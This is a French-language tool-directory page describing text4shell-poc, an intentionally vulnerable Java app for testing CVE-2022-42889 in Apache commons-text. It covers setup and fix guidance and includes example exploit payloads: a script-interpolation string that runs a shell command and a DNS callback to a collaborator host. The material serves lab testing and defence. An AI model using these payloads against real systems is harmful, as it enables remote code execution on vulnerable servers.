Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
text4shell-poc — Application de preuve de concept pour le test de CVE-2022-42889 | Kitploit
Outils/GitHubGitHub/securekomodo/text4shell-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubsecurekomodo/text4shell-poc

text4shell-poc

Application de preuve de concept pour le test de CVE-2022-42889

Voir le dépôt
8111il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Application de test PoC pour CVE-2022-42889

Ceci est une application vulnérable développée comme Preuve de Concept pour la vulnérabilité CVE-2022-42889.

Installation Maven

Pour exécuter cela, vous aurez besoin de :

  • JDK 17 ou supérieur
  • Maven
  1. Clonez le dépôt git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Installation Maven pour créer le JAR
root@kitploit:~
mvn clean install

Cela créera le dossier ./target et dans ce dossier se trouvera le fichier JAR text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Démarrez le serveur web
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

Cela démarrera un serveur web sur votre localhost écoutant sur le port par défaut

8080
  1. Accédez au serveur web

Accédez au serveur web à l'adresse http://localhost:8080/ et vous devriez voir le résultat suivant

root@kitploit:~
Text4Shell POC Test -@securekomodo
Envoyez des payloads à /reflected?poc=yourpayload
OU Envoyez des payloads à /blind avec le payload comme userAgent
  1. Exploitez manuellement ou effectuez un scan en utilisant text4shell-scan

Exemples de payloads d'exploit

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

Encodeur URL recommandé pour une démonstration d'exploit réussie : https://www.urlencoder.org/.

Docker

Vous pouvez également utiliser Docker pour exécuter ce PoC :

  1. Clonez le dépôt git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Construction Docker
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Lancement Docker
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. Testez l'application vulnérable
root@kitploit:~
http://localhost/
  1. L'attaque peut être effectuée en passant une chaîne "${prefix:name}" comme montré ci-dessous :
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

Encodeur URL recommandé pour une démonstration d'exploit réussie : https://www.urlencoder.org/.

Alternativement, vous pouvez valider l'efficacité d'outils de scan comme text4shell-scan

Êtes-vous vulnérable ?

Pour que votre code soit vulnérable, vous devez :

  • Exécuter une version d'Apache commons-text de la version 1.5.0 jusqu'à (et non incluse) 1.10.0
  • Utiliser l'Interpolation pour votre StringSubstitution (voir https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - notez que ce n'est pas très courant

Le correctif

Le correctif consiste à mettre à jour vos instances de commons-text vers les versions 1.10.0 ou ultérieures.

Auteur

Bryan Smith

  • Twitter : https://twitter.com/securekomodo
Télécharger l’outil